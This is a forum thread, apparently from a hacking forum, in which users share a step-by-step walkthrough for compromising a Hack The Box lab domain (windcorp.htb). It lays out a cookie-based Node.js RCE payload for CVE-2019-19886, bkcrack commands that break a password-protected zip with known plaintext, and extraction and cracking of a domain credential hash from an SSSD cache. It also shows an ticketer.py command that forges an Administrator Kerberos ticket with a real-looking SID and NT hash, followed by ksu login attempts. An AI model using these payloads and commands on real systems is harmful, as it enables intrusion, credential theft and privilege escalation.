in the cve-2019-19886 article, you can find a cookie bypass introduced.structure your payload this way:[code]app=$cookie_app;profile=$(echo 'node_js_rce_payload'|base64 -w0)=[/code]anyone able to confirm if the next step after getting a shell to webster is to crack the backup.zip file or not?by browsing the contents of the backup.zip (password protected but paths/names are visible), it seems the contents can be further used for kerberos related attacks and from the login history of webster, the last login was from hope.windcorp.htbyet, i'm not certain if the immediate next step after receiving a shell is to crack the backup.zip or not. cause many wordlists didn't work. also tried mangling some leet forms of potential keywords. i also found cracklib used for preventing the user to use common words as password. but this is considered a deny list, not an allow list that can be used for mangling password lists. thanks in advance

(September 14, 2022, 04:22 PM)Hacker2222 Wrote:

(September 14, 2022, 10:17 AM)meowmeowattack Wrote: in the cve-2019-19886 article, you can find a cookie bypass introduced.

structure your payload this way:

app=$cookie_app;profile=$(echo 'node_js_rce_payload'|base64 -w0)=<original-profile-content>

anyone able to confirm if the next step after getting a shell to webster is to crack the backup.zip file or not?

by browsing the contents of the backup.zip (password protected but paths/names are visible), it seems the contents can be further used for kerberos related attacks and from the login history of webster, the last login was from hope.windcorp.htb

yet, i'm not certain if the immediate next step after receiving a shell is to crack the backup.zip or not. cause many wordlists didn't work. also tried mangling some leet forms of potential keywords. 

i also found cracklib used for preventing the user to use common words as password. but this is considered a deny list, not an allow list that can be used for mangling password lists. 

thanks in advance

i think u can crack zip with bkcrack ??

yes, the idea is that zip includes data that we can find in clear on the box. /etc/passwd as classical example

Can anyone share how to crack it?

Tried with john - fail.

Tried with bkcrack and uploaded /etc/passwd from the box:

bkcrack/bkcrack -C backup.zip -c etc/passwd -p passwd
bkcrack 1.5.0 - 2022-07-07
[14:46:02] Z reduction using 512 bytes of known plaintext
100.0 % (512 / 512)
[14:46:03] Attack on 17297 Z values at index 26
100.0 % (17297 / 17297)
[14:46:52] Could not find the keys.

How??

thanks, i was refusing to go that path for a moment.to sum it[code]# Upload `bkcrack` to the target[/code][code]# create a zip of the passwd file[/code][code]> cp /etc/passwd .[/code][code]> zip passwd.zip passwd[/code][code]# crack and this produces a sequence of codes[/code][code]> ./bkcrack -C backup.zip -c etc/passwd -P passwd.zip -p passwd[/code][code]# set a new pass to the encrypted file[/code][code]> ./bkcrack -C backup.zip -U unlocked.zip meow -k [/code]

(September 14, 2022, 09:11 PM)meowmeowattack Wrote: thanks, i was refusing to go that path for a moment.
to sum it

# Upload `bkcrack` to the target

# create a zip of the passwd file

> cp /etc/passwd .

> zip passwd.zip passwd

# crack and this produces a sequence of codes

> ./bkcrack -C backup.zip -c etc/passwd -P passwd.zip -p passwd

# set a new pass to the encrypted file

> ./bkcrack -C backup.zip -U unlocked.zip meow -k <code1> <code2> <code3>

Thanks. I was missing this .zip arch creation part and that is why I failed.
Now cracked.

not sure what to proceed next

after inspecting the ldb file, where you can find the domain sid, a domain user and the credential hash

var/lib/sss/db/cache_windcorp.htb.ldb

the credential hash can be john'd to reveal the password of the domain user
from there, can also do impersonation to get a Administrator.ccache

but the thing is, from the dns zone transfer and other info found, there are only two hosts found in the domain, webserver and hope. and none of them has any of the smb, ldap ports open. i start to wonder where to proceed next.

it is curious though, which host is serving the ssh port, it's nowhere to be found yet.

Edit: found new hosts by cracking the known_hosts file.

(September 15, 2022, 05:39 AM)meowmeowattack Wrote: not sure what to proceed next

after inspecting the ldb file, where you can find the domain sid, a domain user and the credential hash

var/lib/sss/db/cache_windcorp.htb.ldb

the credential hash can be john'd to reveal the password of the domain user
from there, can also do impersonation to get a Administrator.ccache

but the thing is, from the dns zone transfer and other info found, there are only two hosts found in the domain, webserver and hope. and none of them has any of the smb, ldap ports open. i start to wonder where to proceed next.

it is curious though, which host is serving the ssh port, it's nowhere to be found yet.


Edit: found new hosts by cracking the known_hosts file.

Can you share commands for the impersonation process?

(September 15, 2022, 06:57 AM)samhub123 Wrote:

(September 15, 2022, 05:39 AM)meowmeowattack Wrote: not sure what to proceed next

after inspecting the ldb file, where you can find the domain sid, a domain user and the credential hash

var/lib/sss/db/cache_windcorp.htb.ldb

the credential hash can be john'd to reveal the password of the domain user
from there, can also do impersonation to get a Administrator.ccache

but the thing is, from the dns zone transfer and other info found, there are only two hosts found in the domain, webserver and hope. and none of them has any of the smb, ldap ports open. i start to wonder where to proceed next.

it is curious though, which host is serving the ssh port, it's nowhere to be found yet.


Edit: found new hosts by cracking the known_hosts file.

Can you share commands for the impersonation process?

sure

* ntlm hash can be calculated using https://codebeautify.org/ntlm-hash-generator
* sid is from the ldb dump
> ticketer.py -domain-sid S-1-5-21-1844305427-4058123335-2739572863 -domain windcorp.htb -nthash D90F1699BCEF31DE19FE0658535D00CE -user-id 500 Administrator -spn webserver/hope.windcorp.htb

any findings please share

There's some firewall rules acting on this linux webserver, so we can't use proxychains here. Everything blocked.
But from the inside I can use kerbrute to verify users and passwd legitimacy.
However, I'm stuck with login-in

webster@webserver:~$ kinit -f [email protected]
Password for [email protected]:
webster@webserver:~$ klist
Ticket cache: FILE:/tmp/.cache/Some.User.ccache
Default principal: [email protected]

Valid starting       Expires              Service principal
09/15/2022 22:15:01  09/16/2022 03:15:01  krbtgt/[email protected]
        renew until 09/16/2022 22:14:57
webster@webserver:~$ ksu [email protected] -n  [email protected]
Authenticated [email protected]
Account [email protected]: authorization of [email protected] failed
webster@webserver:~$ ksu  -n  [email protected]
Authenticated [email protected]
Account root: authorization of [email protected] failed

Something is missing. I can't find how to auth to the windows box.
That sucks

@Hacker2222, @onl1_f4ns

ye, not long after my last post, i figured that you can login to ray.duncan as a domain user as the webserver is a domain computer.
believe it or not, for some reason i kept typing the wrong user name as ryan.duncan until i reviewed my notes and spotted the name was wrong....

i got user flag

[email protected]@webserver:/$ kinit ray.duncan
[email protected]@webserver:/$ klist
[email protected]@webserver:/$ ksu